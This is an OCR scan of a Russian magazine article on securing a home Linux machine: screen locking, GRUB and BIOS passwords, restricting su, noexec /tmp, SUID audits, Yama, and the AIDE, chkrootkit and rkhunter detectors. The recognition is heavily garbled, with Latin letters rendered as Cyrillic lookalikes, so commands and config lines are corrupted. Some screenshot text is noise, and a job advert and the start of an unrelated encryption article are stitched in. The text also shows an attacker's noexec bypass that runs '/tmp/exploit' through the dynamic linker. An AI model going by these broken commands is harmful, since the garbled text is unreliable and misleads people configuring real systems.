поимели, пупсик» (хотя первые два предста- 
вителя тройки это, скорее всего, сделают), 

но и логов и другого доказательства своей 
вины и контактных данных. Во избежание 



их безнаказанности следует использовать 
пятую (и окончательную) линию обороны под 
названием аудитинг. 

Это и есть пять основных рубежей, грамотно 
организовав защиту каждого из которых, ты 
сведешь вероятность быт ь поломанным к 
цифре, маячащей где-то далеко позади 0,1%. 

ОТ МАШИНЫ РУКИ ПРОЧЬ! 

Методы защиты от физического проникнове- 
ния на твою машину весьма просты. Доста- 
точно представить себя на месте подлеца, и 
все становится предельно ясно. Во-первых, 
мы можем просто продолжить работу с сис- 
темой, потому как многие даже не удосужи- 
ваются заблокировать экран во время своего 
ухода. Правило первое: всегда блокируй 
экран (в большинстве сред <СМ+А11:+[_>). 
Во-вторых, мы можем попробовать подоб- 
рать пароль, который нередко бывает равен 
комбинациям вроде «цѵѵегіу» или «123». 
Правило второе: используй сложные и 
надежные пароли (о том, как их придумать, 
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АРТ : : Регіосііс : : 
АРТ : : Регіосііс: : 
АРТ : : Регіосііс: : 
АРТ : : Регіосііс: : 
АРТ : : Регіосііс: : 

Настраиваем автообновление 



ЕпаЫе “1"; 

ирсІаІіе-Раскаде-Іізіз “1"; 
ОошІоасІ-ІірдгасІеаЫе-Раскадез 
Аиіосіеапіпіегѵаі "Б"; 
ІІпаііепсІесІ-ирдгасІе "I м ; 







читай в боковом выносе I N РО) . Мы можем перезагрузить 
компьютер и с помощью 6ВИВ загрузить ОС в однополь- 
зовательском режиме, получив полный контроль над 
системой. Правило третье: установи пароль на 6 ВО В 
(об этом во врезке). Увидев, что ОПІІВ запаролен, мы 
можем войти в меню ВІ05, установить в качестве первого 
загрузочного устройства СО-ПОМ и загрузиться с ЫѵеСО, 
получив полный доступ к содержимому жесткого диска. 
Правило четвертое: настрой загрузку только сжесткого 
диска и поставь пароль на ВІ05. Но это нас не остановит: 
мы снимем крышку с корпуса и сбросим настройки СМ 05 
вместе с паролем, просто вынув батарейку на несколько 
секунд. Правило пятое: покупай корпус с замком. Увидев 
замок на корпусе, мы забираем весь системник с собой и 
разбираем его на ближайшей свалке. Правило шестое: 
всегда пристегивай системник к батарее с помощью 
цепи. 

Последнее правило, конечноже, шутка, но и в ней есть 
доля правды: эффективность защиты от физического 
доступа падает прямо пропорционально росту наглос- 
ти взломщика. Кстати, есть еще одна рекомендация, 
связанная с запираемыми на за мок системниками. 
Большинство из них имеют переднюю крышку, которая 
также обеспечивает некоторую защиту СБ-привода, 
ІІ5В-разъемов и кнопок включения/сброса. Однако мы 
всегда можем зажать <СігІ+А11:+0еІ> на клавиатуре для 
перезагрузки машины. Но комбинация не сработает, 
если открыть файл /еіс/іпійаб, закомментировать строку 
«са-сМаІібеЕ/зЬіп/зЬиІбоѵѵп -1:3 -г поѵѵ» и выполнить 
команду «/зЬіп/іпіІ: ц». 

УГРОЗА ИЗВНЕ 

Те, кто пролезает на машину жертвы из Сети, обычно 
используют несколько простых и проверенных приемов. 
Самое простое, что может сделать злоумышленник 
— просканировать твою машину на открытые порты и 
попытаться найти уязвимый сетевой сервис. В борьбе с 
такими экземплярами фауны кул-хацкеров поможет от- 
ключение ненужных демонов, своевременные обновле- 
ния дистрибутива и чтение моей статьи «Огненная дуга», 
посвященной правильной настройке брандмауэра 
(см. ][ от 06.201 0). Обломавшись на этом пути, хацкер мо- 
жет попытаться подсунутьтебе троян под видом легаль- 
ной программы или использовать дыру в браузере. В этом 
случае все просто: ставь софт из официальных репози- 
ториев дистрибутива, используй правильные браузеры 
свежей версии. 

Поняв безуспешность своих попыток проникновения, 
взломщик может попробовать провести ОоЗ/ВОоЗ. От 
хорошей распределенной атаки ты, скорее всего, не спа- 
сешься, а вот небольшую волну вполне сможешь выдер- 
жать, если будешь следовать рекомендациям, описанным 
в статье «Устоять любой ценой» (][ от 09.2009). Хорошей 
практикой в борьбе с дырами является настройка авто- 
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--НАГУУ-- |рнкй14н| Івдал (вніі) и йіілЬѴ«й„ Ьит Нлі ш ѵліі-і ікііі. 

- -КАРЛ - - Ірлізсілк] Ь.чіл (#ту 1* ЛійЬЫ, Ьих Клз * іН*11 , 

--НІПЧ-- |ряЗэб14н] І_ад>іп- Ігчтл) ля. -йлэаЬ\сй г ЬиС. Иві * ѵ*1іді іЬяІЛ . 

- -МАЙН - - |рлзай14и1 і_.аді* {м&ойрі и гііааЫей. Ьит Илі а ѵаііЛ іІ»и. 
гѴАРД- ІрліійЫи'І Цадігіі 4 рГчЭіх у к ІА йіалЬЪей. Ьиі Илз А ѵАіііі 

-НАИН- |раьъ014«| Іьчдщ іа йля-аЫ^й. Ьиі Ила л ѵ*\мІ аЬаІІ- 

--ІШУУ-- ]рянй15ы] Ьядіп ІО іулс йоеа гші Иаѵя л ѵяіілі яЬвТЛ 1 /Ьігі/ лупе \ . 

Даже в со временном дистрибутиве Тіа ег находит всем извест- 
ные проблемы безопасности 



м этического обновления ОС, благодаря которому система 
всегда будет оставаться в свежайшем состоянии. Такие 
дистрибутивы, как ІІЬипІи, Ребога, ОрепЗиЗЕ, уже имеют 
в своем составе графические напоминалки, которые 
время от времени выскакивают из трея и сообщают об 
очередном обновлении. Это удобно, но быстро надоедает: 
гораздо эффективнее сделатьтак, чтобы система сама 
производила обновления в фоне, не отвлекая пользова- 
теля от работы. В ІІЬипіи это делается через графический 
интерфейс (Зузіепп Абтіпізігаііоп -> Зоііѵѵаге Зоигсез 
-> Брба^ез Аиіотаііс ирбаіез, Іпзіаіі зесигііу ирбаіез 
ѵѵіІИоиІ сопРгтабоп) или с помощью модификации файла 
/еІс/арі/арРсопТб/І Орегіобіс: 

$ зийо ѵі /еіс/арі/арі.сопі.й/і Орегіосііс 

АРТ : : Регіосііс : : ЕпаЫе " 1 " ; 

АРТ : : Регіосііс : : ЮрсІаЦе-Раскаде-ЬізЦз " 1 " ; 

АРТ: : Регіосііс: : БоѵтІоаЫіІрдгасІеаЪІе- 

Раскадез "I м ; 

АРТ : : Регіосііс : : Аикосіеапіпкегѵаі " 5 " ; 

АРТ: : Регіосііс: : ІІпаккепсіесі-ІІрдгасіе "1"; 

Замечу, что это относится только к обновлениям безо- 
пасности, простой апдейтсофта придется производить 
руками. 

От возможных дыр в софте также очень эффективны 
такие системы, как ЗЕЫпих или АррАгтог (уже интег- 
рированные в ІЭЬипІи, ОрепЗиЗЕ и Еебога), которые 
просто не позволят уязвимому сервису выполнить код, 
подсунутый взломщиком (мы не раз писали о настройке 
популярных расширений безопасности для ОС Біпих, 
подними архив ][). 




> іпіо 

• Если с приду- 
мыванием сложных 
паролей туго, 
воспользуйся 
утилитой АРО, 
которая поможет 
сгенерировать 
весьма сложный, 
но притом вполне 
читаемый пароль. 

• Поиск зиіб/ 
здіб-файлов с 
несколькими 
ссылками: 

$ ііпсі / -Суре 1 \ 
( -регтп -004000 -о 
-регтп -002000 \) 
-Ііпкз +1 -1з 
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ІІІЧІХОЮ 



:■ аіяйй I Іуѵ г 

*І§*Г МЧ'І с4інгкчп| яу*Е-м 

В#ѵ*Іо(м^ Ьу Ті і-н іф ЕНІѵіп-зЛу, 

Ь? 1ІЧ Д^меН А*ІІ*гч№ ев-гм^і^івп. 1Ж-20П 
РиНІЧГ фгійіів Ьу ЗёЬІЛГ Гі гт^ѵ^МІ -Ърпрц ■г»9 , А4І-Н47 
Е НАМИ №і 11м НШ Е«мгі1 Рь*1іь Шин Г4ИД 

СопІІ^ігіч..* 

ИШ! С г? ѣо- сіжк иііяф солТід Гог ' іЫ*' сипгилд І.Ьпл. 2.&.32-74-РѴМГІ*:.. . 

-‘СіДОІйі- (г.даМЗк] На кіѵр *-пп Г !пр_іР ■ ! Ісп Т±\т*. і-й г ЬіАіе . 17 Э4 --;|кгш г і'. . 11 

*4"в 

сэтіідиг-ііютъ <і1іі Гог цмгчгіг І.:пл» 2. 

ТА((1 г НСѴГІ^Т КГ№( “■ і, 2гі. г»“р я М, И-в»,« ■■■ 

1Ы»> «явітіпй 1ТІѴПІТ РШГ1 і*« 133.1. 

II; IV 1 ІІІГІІЩІ 'Г 1.1* іуіѣяѵк ІСЙПЕ ІП Ьк І в ГППІІ . ., . 

ІБіЭА-» Оіясіітв рл-и.цгй ііііі 

ІЬ:»* 1**екпй рпсмб ПѴИ,, Г 
14 і» 4 йНіеЬич иі#г кс^и... 

1Е;№- -ПксЬшд .гМііі Шя... 

ІБіЗІг ■ПіАіУи’і^ ,МкК 1 АІ** . . . 

фЬи^Ьіп^ 1ІТІ4І, МТигіЦ-р-. нт? Ірдііг г?жіТ црігя? |.пп. ГІ\л г . , 

Очскіігд р*Тн ніішрі.. 

1Б : ЗА- 1 Пйіік іу-.д і№ПрНШгі Ті>р 1*<ТМР--- 
і*:«> ^..ікілр Ы|1 йікшяѣ... 

Тіаег приступил канализѵсистемы 



СВОЙ ЛИЧНЫЙ БАСТИОН 

После проникновения в маши ну через уязвимый сервис взломщик 
скорее всего будет иметь очень ограниченные права и возмож- 
ности (почти все сетевые сервисы в II N IX работают от какого-либо 
специального пользователя, не имеющего серьезных полномочий 
в системе], поэтому первое, что он попытается сделать — повысить 
свои права до гооЕ Наша задача — приложить все силы для того, 
чтобы помешать ему это сделать, иначе машина окажется полностью 
в чужих руках. Ниже мы рассмотрим типичные приемы злоумышлен- 
ии ко в, направленные на получение гооі, и методы защиты от них. 

1 . Первым делом хацкер попытается выполнить команду зи в надежде 
на то, что пароль гооі: окажется пустым или настолько простым, что 

он сможетего подобрать. Мы обезопасим систему, просто добавив в 
файл /еіс/рат.сі/зи строку «аиіЬ гедиігесі рапгщѵѵЬееІ.зо» сразу после 
строки «аиіЬ зиббісіепі; рат_гооІок.50». Теперь право использовать зи 
будет только у пользователей, состоящих в группе ѵѵЬее I (естественно, 
ты должен себя в нее добавить). 

2 . Потерпев неудачу в получении прав гооі; обычными методами, 
взломщик попытается залить на твою машину эксплойт, чтобы добыть 



Пароль на 6Н1ЛЗ 




Для установки пароля на 0ЕБВ необходимо сделать две вещи: 

1 . Запустить команду/збіп/дгиЬ и набрать в ее интерактивной оболочке 
команду тббсгурЕ После этого программа запросит пароль и выведет 
на экран его тбб-хеш. 

2. Открыть файл /Ьооі/д ги Ь/дгиЬ.сопб и добавить в него опцию 
«раззѵѵогб —тб5 хеш-пароля». 




Тідег - анализатор локальной безопасности 




Тідег — это пакет, состоящий из коллекции збеіі-скриптов, бинарных 
файлов и файлов данных, используемый для поиска проблем безопас- 
ности ІЛЧІХ-систем. Он производитсканирование конфигурационных 
файлов, файловых систем, конфигурационныхфайлов пользователя 
и генерирует отчеты. В своей работе используетсбкгооікіі: и ОоЬп іЬе 
гіррег. 




2ерроо - поиск руткитов на уровне ядра 




Херроо позволяет найти Ыпих руткиты, скрытые процессы и сетевые 
соединения, новые системные вызовы и многое другое, используя 
прямой доступ к памяти ядра с помощью файлов /беѵ/ктет и /беѵ/ 
тет. Исходный коддостѵпен на сайте проекта: ИЦрУ/зоигсеІогае.пеІ;/ 
ргоіесіз/герроо. 






» / -ІУН Т \С -мгщ 

/ оЬ 1 п / і*і м л _ с КЪ рнЛ 
/Ыіъ/рілф 

/ЬіП/*ѴМ-!«мп( 

/Ыл/іи 

/Ьгл/ишгі 

/ЬІл/рілдй 

/Ьі/ѴЧнр0ііп1 

/4*1 Г і/« КгймУ^і г*** ■ нп4 Ьо>к 

/ ІЩ */А ІэтЛт г ЧѴІЯѴЧ 

/ и* т/ ьЬ ьцУілл і аа 
/ІЯ г/ѵЬці/ррргі 
/ІЯ Г/лЬіЛ/рЕккгійгВД 

/іл г/Ь іп/ні з 1 -ип1«к 

/ЦІГЛ-Ііі/ріиий 
/ія-г/Ъіл/нц.1 ■ Ілск. 

/иь г/Ьіл/і гж ■ гпиг іЙі . іриігіі* 

/ ія т-Л і *і / Ь « г 1 1 ІКІ 
/ѵі гЛія/к-н г*™т >■ 

/іЛг/іііп/еЬэЬ 
/ ія г/ѣ т / бот 1 к к V 1 1 * 

/лг/Ъіл/сііГп 
/икг/ІШ/явм-ігі 
/іяг/рііі/ктчіп. гщщ\ 



0і г* №лрр и Н.-1КК 



СписокБЦІР-софта всовременном Ьіпих действи- 
тельно слишком велик 



права гооНа через локальные дыры в безопасности. Но так как его 
права сильно ограничены, он сможет использовать всего несколько 
мест для заливки вредоносного кода: общедоступный каталогАтр 
и приватный каталог взломанного сервиса (например, корневой 
каталог веб-сервера или РТР-сервера). Защититься довольно просто, 
достаточно вынести эти каталоги на отдельные разделы и подключить 
с опциями поехес (а для верности и позиіб.побеѵ]. Например: 

/с1еѵ/зс1а5 /Стр ехС2 позиісі, поехес , посіеѵ О О 

Так взломщик не сможет выполнить свой эксплойт в указанном 
каталоге. Но не все так просто — знающий человек запустит програм- 
му с помощью динамического л инковщика и легко обойдет данное 
ограничение: 

$ /1іЪ/1б-1іпих . зо . 2 /Стр/ехрІоіС 

К сожалению, в стандартном ядре Ыпих защиты отданного вида атак 
нет, но она есть в патче П5ВАС ( ѵѵѵѵѵѵ.гзЬас.огд ]. который в любом 
случае рекомендуется кустановке. 

3. Если каким-либо образом взломщику удастся обойти проблему 
запуска эксплойта, он сможет направить его действие всего в две 
стороны: ядро ОС или про граммы, имеющие 51ІЮ-6 ит. Только эти два 
компонента ОС могут дать ему заветный гооі-доступ. Но если с ядром 
все ясно (уязвимость либо есть, либо ее нет), то с $111 0 -софтом все не- 
много сложнее. Даже если в одной из них будет найдена уязвимость, 
взлома можно легко избежать, просто сняв 5111 0-бит с программы. 
Для этого получи списокЗІІЮ-софта с помощью бпб: 

$ зисіо Іііпсі / -Суре I \( -регш -04000 -о \ 

-регш -02000 \) \-ехес 1 з { } \; 

А затем лиши некоторые из программ привилегий исполнения с 
правами гооЕ 

$ зисіо сіішосі а-з /путь/к/ бинарнику 

Будь осторожным — оставив без прав важные системные программы, 
ты можешь обрушить всю систему. Как всегда, тап в помощь. 

4 . Один из способов проползти в систему находится в области чело- 
веческой безалаберности. Чтобы заставить прочитать свои данные 
какие-либо важные системные утилиты и таким образом привести 
их в желаемое состояние, взломщик может найти открытые для 
всеобщей записи файлы и вставить в них какой-либо код (например, 
добавить в опции сетевого сервиса возможность входа без пароля 



► 094 
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/Ыл/цпр 

АШСртЦі 
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ДкіпЛШ 

ФМпі 
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Вывод гкЬипІег более приятен глазу. 



или записать в файл код, который сорвет стек утилите, прочитавшей 
ее]. Чтобы избежать такой ситуации, достаточно найти все общедо- 
ступные файлы и снять бит записи для всех: 



# Ііпсі /сііг -хсіеѵ -Суре сі \ ( -регш -0002 -а \ 
! -регш -1000 \) -ргіпС 



5 . Потерпев фиаско в борьбе за права суперпользователя, взломщик 
попытается разнюхать побольше информации о системе и утащить 
важные данные. В первую очередь это касается данных взломан- 
ного сервиса, например, файлов, выложенных на РТР-сервер, или 
страницы веб-сайта. Фактически защититься от этого можно только 
вовремя распознав атаку и запретив все подключения с помощью 
файера (либо просто вытащив кабель из сетевой карты]. Второе — это 
данные о самом сервере, маршрутизация, ближайшие машины и т.д. 
Обычно ихтоже невозможно скрыть без нарушения работоспособ- 
ности системы. Третье — личные данные пользователей. В боль- 
шинстве дистрибутивов файлы, создаваемые в домашнем каталоге 
пользователя, остаются видимыми всем подряд (маска 022), поэтому 
даже не имея каких-либо серьезных прав в системе, взломщиксмо- 
жет их прочитать (кроме архи важных файлов с паролями различных 
программ, которые при создании защищают файл от посторонних]. В 
борьбе с этим поможет одна коротенькая строчка, записанная в файл 
~/. ргобі Іе : 



шпазк 077 



Теперь все вновь создаваемые файлы пользователя будутзащищены 
от посторонних глаз. 

Вообще, по-настоящему безопасная домашняя машина не должна 
иметь на своем борту никаких сетевых сервисов, кроме совсем важ- 
ных и необходимых (ОрепЭЭН, например], а если уж припрет выло- 
жить в локальную сеть свой файловый архив или сайт, воспользуйся 
системой виртуализации уровня ОС, такой как ЕгееВЭО Да іі или І_іпих 
ѴЭегѵег (обе они уже были подробно описаны на страницахжурнала]. 
Кроме сетевых сервисов не исключена возможность подцепить 
заразу прямо через дыру в веб- б раузе ре или каком-нибудь рібдіп. 
Если такое произойдет — пиши пропало. Взлом щи к унесет все, 
включая пароли, сохраненные браузером, личную переписку и всю 
прочую конфиденциалыщину (о методах получения гооі в этом случае 
я вообще молчу, их сотни). Даже если твои пароли будутзашифрова- 
ны, никто не помешает ха цкеру унести все настройки того же Рігеіюх, 
положить ихнасвоюмашинуи броузить интернет от твоего имени. 






ЕѴіГш *(,!■] сІіесЬ. йГ клеил гмПіЬІ (Не-н тѵй іікітч: ІйЫ г- 



Тп^ері - Чі.г | і-н.і і 


[ ІЬі і 


ІіаиаІ ) 


Айи Шгл 


I Ьоі 


ІЫ 1 


Ар4Ш РмТУН 


І іьіі 


І ікл кі ) 


ЬЬг* Ил-НкН 


Е кйіі 


І«ігИ 1 


3*1 Ш 


І НчТ 


] 


Ар*;*»? №і4 


Е Нпі 


ІМнІ I 


АіЬ-ігл С 1-ігк] НпоІкЬІ 


[ АН)! 


Іопі I 


СШІЧіг 


[ МПІ 


1 


ВййкНШ «ІЫІІШ 


Г ЧпІ 


«імй 1 


МІ? НшІЬЫ 


Е Шйі 


\ 


ІІШЬШ ІЬѵСігіІ 


| 1ыГ 


Шяш* ] 


ййдкіт 


I N"1 




ПІІР. №іі иівдатг.Ег МИМИ» 


{ 


- ІІН ) 


Мяпг КН 


[ № 1 


1 


№іі пытки 


[ Н. Д 


>• 1 | 


ОІЕЙ-КІІ НюІІЫ 


[ Гі. - 


г - і. <1 1 


пі 


[ ІІ.И 


ІіШІ 1 


■ЕИмг-ннкг ЙюІкН 


Г «іі 


(«ЧІТИ I 


Е^й 1КИ 


[ ШІ 


: 


»Д*р ІЛчіч ЙАвтЛІІ 


[ 


І 1 




[ №1 


І«шИ ! 


Гіі ЬОйікИ 


Е 




І^кІЕ ЕкШІІЕИ 


[ швъ 


И 1 


ОнКН ЧКТІГК 


[ М:,І 


І4МЛГЖІ ] 


ІКРІ 


[ НлІ 


1 


31 Р С К Ь с 


[ ІкіТ 


- I 


Ир«*п ЛиЦЬИ 


[ АИі 1 


1™ы*| ] 


Щчііе Ѣюікіі 


[ 


І1ЯЛНІ 1 




І Ч-ІІ 


| 


і І_ и Е • 


1 ■ 


1 



Кроме обычных проверок, гкЬипІегтакже ищет извес- 
тные рѵткиты 

Единственное, что можно порекомендовать для защиты оттакой 
ситуации — хранить все конфиденциальные данные на виртуальном 
разделе и подключать его ксистеметолько по мере необходимости 
(полное шифрование /боте не спасет, потому что взломщик окажется 
на уже расшифрованном разделе]. 

Хорошей идеей будет установка модуля Еіпих-ядра Ѵата ( ЬирѴ/ІктІ. 
огд/ікт 1/201 0/6/23/25 ), созданного разработчиками из СапопісаЕ 
Ѵата по умолчанию включен в дистрибутив ІЛэипІш и позволяет 
защитить систему от некоторых видов локальных атак: 

• Атака через подстановку символьной ссылки в общедоступном 
каталоге. Некоторые приложения создают во время своей работы 
символьные ссылки, в каталогеДтр или /ѵагДтр. В некоторых си- 
туациях взломщик может подменить эту ссылку, заставив программу 
обратиться к поддельному файлу. После установки Ѵата следовать 
по ссылкам, созданным в таких каталогах, можно будеттолько в том 
случае, если ІІЮ процесса, открывающего ссылку, и ІІЮ владельца 
ссылки совпадают. 

• Атака с использованием жестких ссылок. Само по себе создание 
жестких ссылок пользователем, не имеющим доступ к оригинальному 
файлу, не является проблемой, так как ссылка будет иметьте же пра- 
ва доступа. Однако через создание жесткой ссылки взломщик может 
подсунуть исходный файл другому привилегированному приложению 
и раскрыть содержащиеся в нем данные. Ѵата запрещает создание 
жестких ссылок пользователям, не имеющим доступа к оригинально- 
му файлу. 

• Атака с использованием системного вызова рітасе. По умолча- 
нию любой процесс может выполнить отладку другого процесса 
с помощью рітасе, если ІІЮ отлаживаемого процесса равен ІІЮ, 
вызвавшего рітасе. Это может привести ктому, что при взломе 
одного из пользовательских приложений взломщик сможет раскрыть 
состояние и конфиденциальную информацию другого приложения 
этого пользователя. Ѵата разрешает использовать системный вызов 
рітасе только для отладки процессов-потомков. 

ИСТРЕБЛЯЕМ НЕЧИСТЬ 

Что ж, мы защитили систему снаружи и внутри, но как обезопасить 
себя в том случае, если все это не поможет, и взлом щи к таки проник- 
нет в систему? Попробуем разобраться. 

Даже мало-мальски образованный хацкер прекрасно понимает, 
что через уже использованную дыру в безопасности он не сможет 
ходить вечно (если это уже опубликованная уязвимость, ее исправят 
буквально через час-два, и ты получишь заплатку в виде баг-фикс 
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обновления, если же это неизвестная сообществу дыра, информация 
о ней рано или поздно всплывет), поэтому, скорее всего, он попытает- 
ся установить в систему бэкдор, который позволит без всяких проблем 
ходить на твою машину, или бота, рассылающего спам. 

Бэкдоры, трояны, боты и все остальные «нелегалы» могут быть как 
совсем простыми, так и весьма изощренными, выполненными в виде 
отдельной программы/скрипта, внедренными в легальные програм- 
мы или же подключенными к ядру с помощью модуля. Однако это 
не имеет никакого значения, потому как любой нелегал может быть 
отловлен через анализ системы на модификации (никакой код не 
может быть внедрен вОСналюбом уровне без модификации окруже- 
ния исполнения). А главное, что такой анализ легко провести через 
заблаговременную установку специальных систем, называемых НЮ 5 
(Локальные системы обнаружения вторжений). 

Одна из самых популярных НЮ5, доступных в ІЛМІХ-системах, носит 
имя Тгірѵѵіге, однако в последнее время она потеряла свои позиции в 
пользу более открытого аналога под названием АЮЕ (Абѵапсеб Іпіхизіоп 
Оеіесііоп Епѵігоптепі: — продвинутая система обнаружения вторже- 
ний). Как и Тгірѵѵіге, АЮЕ основана на простом предположении: если 
какие-то файлы в системе изменились без предупреждения — значит, 
произошло вторжение. На деле это выглядитеще проще: при первом 
запуске АЮЕ создает базу с контрольными суммами всехсколько- 
нибудьзначимыхдля взломщика системных файлов и периодически 
сверяет ее состояние с актуальным состоянием системы. Если что-то 
изменилось, на предварительноуказанный е-таіі отправляется письмо 
с предупреждением и деталями изменения. 

АЮЕ доступна в виде прекомпилированных пакетов для любого дист- 
рибутива и может быть установлена с помощью стандартного пакетного 
менеджера: 



$ зисіо арЦ-деС іпзіаіі аісіе 



Конфигурация АЮЕ располагается в двух конфигурационных файлах: 



* /еіс/сіеіаиІЦ/аісіе — главный конфигурационный файл 

* /еіс/аісіе/аісіе . сопі — правила 



Первый хранит основную конфигурацию АЮЕ и обычно даже не требует 
правки. Единственная опция, которую имеетсмысл изменять, носитимя 
МАНТО и содержит адрес электронной почты, на который будут отправ- 
лены все отчеты об изменениях в файлах (поумолчанию — гооі:). Второй 
хранит список правил, на основании которых ведется анализ состояния 
системы (права доступа, контрольные суммы и т.д.) В нем же задано 
место хранения базы данных, хранящей предыдущее согласованное со- 
стояние системы (/ѵаг/ІіЬ/аісіе/аісіе. сІЬ]. Популярные дистрибутивы уже 



содержат список необходимых правил, которые могутбыть вынесены 
в отдельные файлы каталога /еЕс/а ісіе/а ісіе.сопб.сі , поэтому мы не будем 
что-либо в них менять. 

Чтобы инициализировать новую базу АЮЕ, воспользуемся командой 
аібеіпіі: 

$ зисіо аісіеіпіС 

После окончания ее работы в каталоге /ѵаг/ііб/аісіе будет создана новая 
база с именем аібе.бб.пеѵѵ. Чтобы сделать ее базой согласованного 
состояния системы, произведем переименование: 

$ зисіо тѵ /ѵаг/ІіЬ/аісіе/аісіе . сПэ . пеѵѵ /ѵаг/ІіЬ/аісіе/аісіе . 
сіЪ 

После этого можно произвести первую проверку системы: 

$ зисіо аісіе -с /еіс/аісіе/аісіе . сопі --сЬеск 

При установке АЮЕ помещает себя в список заданий сгоп, поэтому 
проверки будут происходить каждый день. Однако не следует полно- 
стью полагаться на систему. Если взломщиксможет модифицировать 
системные файлы для установки бэкдора, он также сможет модифици- 
ровать и сам АЮЕ, включая базы данные и бинарные файлы, поэтому 
лучший способ использования АЮЕ заключается в помещении ее 
на ІЧБВ-флешку и ручном запуске в случае необходимости (не забыв 
исправить путь поиска баз данных в файле а ібе.сопіф 

# ср /ѵаг/ІіЬ/аісіе/аісіе . сіЬ* /изг/Ьіп/аісіе \ 

/еіс/аісіе/аісіе . сопі /екс/аісіе/аісіе . сопі . сі/ * /шесііа/ 
флешка 

Конечноже, после каждого намеренного изменения состояния системы 
(установка пакетов, изменение конфигов и т.д.) базу придется пересо- 
здавать. Такова уж расплата за гарантию безопасности. 

Кроме НЮ5 общего назначения для ІЛЧІХ-систем разработано 
несколько утилит, специализирующихся исключительно на руткитах. 
Программы сЬ кгооікіі и гкЬипІег используют базу сигнатур для поиска и 
обнаружения вредоносного ПО (гкЬипІегтакже проверяет целостность 
исполняемых файлов, загрузочных скриптов и анализирует сетевые ин- 
терфейсы на предмет прослушиваемых портов). Обычно их используют 
совместно с АЮЕ для создания дополнительного слоя безопасности. 
Доступны в любом дистрибутиве. Использовать предельно просто: 

$ зисіо сккгооккіЦ 
$ зисіо гккипкег --сііеск 

На экране появится информация о проверяемых бинарниках, файлах 
доступа, проверки на известныетипы руткитов и т.д. Обе программы 
написаны на языке збеіі, поэтому используют стандартные утилиты 
командной строки (аѵѵк, саі, д гер, ...) для выполнения проверок. Если 
ты неуверен в целостности этихутилит, помести их заведомо «чистые» 
версии на флешку и вызывай программы следующим образом: 

$ зисіо сккгооЦкіЦ -р /шесііа /флешка 
$ зисіо гкігипкег --сііеск --Ьіпсііг /шесііа/флешка 

ВЫВОДЫ 

При должном терпении организовать действительно прочную 
защиту домашней машины нетаксложно. И я надеюсь, что смогэто 
доказать, даже несмотря на то, что далеко не все из задуманного 
удалось поместить в статью. В частности, пришлось опустить целый 
раздел, посвященный аудиту происходящих в системе действий, но 
это настолько обширная тема, что ей лучше посвятить отдельную 
статью, и я надеюсь, что в одном из ближайших номеров она будет 
опубликована. "!" 
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«Инженер телекоммуникационных сетей» 

Требования: 

* опыт работы а телекоммуникационных компаниях 

* знание основных протоколов Интернет 

* знание Цпііх РгееВЭО, СІЗСО 108 

* знание языков программирования С, РегІ 

* опыт работы с сетевым оборудованием. 



Обязанности: 

* настройка сетевого оборудования 

• поддержание функционирования серверов и маршрутизаторов. 

Кандидатам на занятие этой должности нужно заполнить 
анкету на ѵ«ѵ™,гті.гц/еітірІоу_ас1сгііп 



Обязанности: 

* техническая поддержка абонентов по телефону 

* удаленная диагностика неисправностей в сети связи 

* настройка и проверка сетевого оборудования. 

Кандидатам на занятие этой должности нужно 
обратиться к ГороСинской Наталье 



142784, Московская обп., Ленинский р-н. 
л. Румянцева, Бизнес Парк, стр.1 , офис 402 Б 



'л'ѵлѵ.гтпі.ігі 
+7 495 983-5212 



Реклама 



«Инженер технической поддержки» 



Требования: 

- опыт работы в телекоммуникационных компаниях 
основных протоколов Интернет 
• опыт раооты с сетевым оборудованием. 




Каждый из нас хранит на жестком диске изрядное количество 
конфиденциальной информации. Для кого-то это всего лишь пароли 
от различных сетевых сервисов, другие ответственны за хранение 
важной документации, третьи уже не первый год занимаются разработкой 
инновационной программы. В любом случае, данные необходимо беречь 
от посторонних, что в нашем мобильном мире сделать довольно 
проблематично без использования систем шифрования. 



Взглянув на список шифрующего ПО для Ыпих 
и проанализировав степень популярности 
и актуальности каждого из них, мы придем к 
выводу, что естьтолько четыре безопасные и 
поддерживаемые криптосистемы для шиф- 
рования жестких дисков и других носителей 
информации налету: 

1 . Іоор-аез ( ЬіІрУ/Іоор-аез.зоигсеіюгде.пеІ: ] — 

модификация стандартного Ыпих-драйвера 
Іоор.ко, которая не только подключаетустройст- 
ва и образы в ІоорЬаск-режиме, но и позволяет 
производить их шифрование на лету. 

2. ШКЗ/сІт-сгур* — система шифрования, 
основанная на стандартной подсистеме шиф- 
рования Ыпих-ядра под названием бт-сгурі и 
следующая рекомендациям ТК51/ТК52. 

3. ТгиеСгурІ — кроссплатформенная система 



шифрования жестких дисков и образов с графи- 
ческим интерфейсом. 

4. ЕпсРЗ — файловая система уровня пользо- 
вателя, выполняющая шифрование данных на 
уровне файлов, а потому способная работать 
поверх любой ФС. 

Каждая из этих систем имеетсвои преиму- 
щества и недостатки, поэтому споры отом, что 
именно использовать, не прекращаются до сих 
пор. Драйвер Іоор-аез отличается простотой 
реализации, непревзойденной производитель- 
ностью и стойкостью к взлому, однако метод 
его установки настолько нетривиален, что 
может отпугнуть даже продвинутых пользова- 
телей (мы не будем рассматривать Іоор-аез, 
ему была посвящена целая статья в одном из 
предыдущих номеров]. ШКЗ/сІпп-сгурЕ с другой 



стороны, опирается на стандартную подсистему 
шифрования носителей, появившуюся еще в 
ядре версии 2.5 и поддерживающую десятки 
различных криптоалгоритмов. ИЖЗ/сІпп-сгурІ 
доступен в любой Ыпих-системе, но, в отличие 
от Іоор-аез, до сих пор страдает от некоторых 
неисправленных проблем и менее производи- 
телен. ТгиеСгурр пришедший в Ыпих из мира 
ѴѴіпсІоѵѵз-систем, медленнее ШКЗ/сІпп-сгурЕ 
но, в отличие от последнего, предоставляет 
по-настоящему кроссплатформенное реше- 
ние (тома ТгиеСгурІ: могут быть прочитаны в 
ѴѴіпсІоѵѵз и Мае 05Х], обладает встроенным 
графическим интерфейсом и позволяет созда- 
вать та к называемые скрытые тома (невидимые 
за шифрованные тома внутри зашифрованных 
томов]. ЕпсРЗ — самое медленное, наиболее 



► 098 
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ЕпсЕЗ шифрует не только содержимое фай- 



МмУі пи>{^1 ЬкРІ; 

*»*№гт* Н№ |й^$: 

Создаем новую файловую систему ЕпсРЗ 



лов, но и их имена 



уязвимое, но настолько притягательно простое и удобное 
решение, что его нельзя обойти стороной. 

Если говорить о стойкости шифрования и пригодности для 
повседневного применения, то здесь все в порядке, по 
крайней мере, у первыхтрех претендентов. Все три системы 
производят шифрование на лету и находятся ниже файловой 
системы, поэтому взломщик не имеет ни единого шанса 
узнать какие-либо подробности о хранящихся внутри тома 
данных. Каждая система защищена оттак называемой 
